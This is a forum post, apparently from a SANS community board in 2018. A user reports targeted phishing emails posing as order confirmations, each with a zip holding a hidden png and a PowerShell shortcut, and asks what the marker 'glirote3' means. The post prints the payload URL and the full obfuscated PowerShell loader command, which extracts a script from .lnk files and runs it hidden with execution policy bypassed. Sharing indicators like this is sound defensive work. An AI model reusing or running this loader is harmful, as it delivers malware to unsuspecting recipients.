|
All, Over the last couple of weeks I have received a couple of targetted emails with links to a zip file which contains a shortcut and a png file. When I say targetted they have the have my name and the main office telephone number along with postcode (i.e. zip code). Each email claims to be an order confirmation . The png file for some reason is marked as hidden, and the shortcut is actually a powershell link. The link (reported to godaddy so may go soon hopefully)is: https://rkbbeauty.com/.cabinet/838IZ46044-package-updated The shortcut powershell command is: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $no="po"wer"shel"l -win hi"dd"en -c "fi"nds"tr /s glirote3 $env:userprofile\*.lnk > $env:userprofile\Downloads\vvv"."p"s"1; & $env:userprofile\Downloads\vvv"."p"s"1"; start-process $no Is anyone aware what glirote3 is as I am not turning up any references from a quick search |
W60 14 Posts |
| thread locked Quote Subscribe |
Sep 4th 2018 3 years ago |
Sign Up for Free or Log In to start participating in the conversation!
https://www.sans.edu
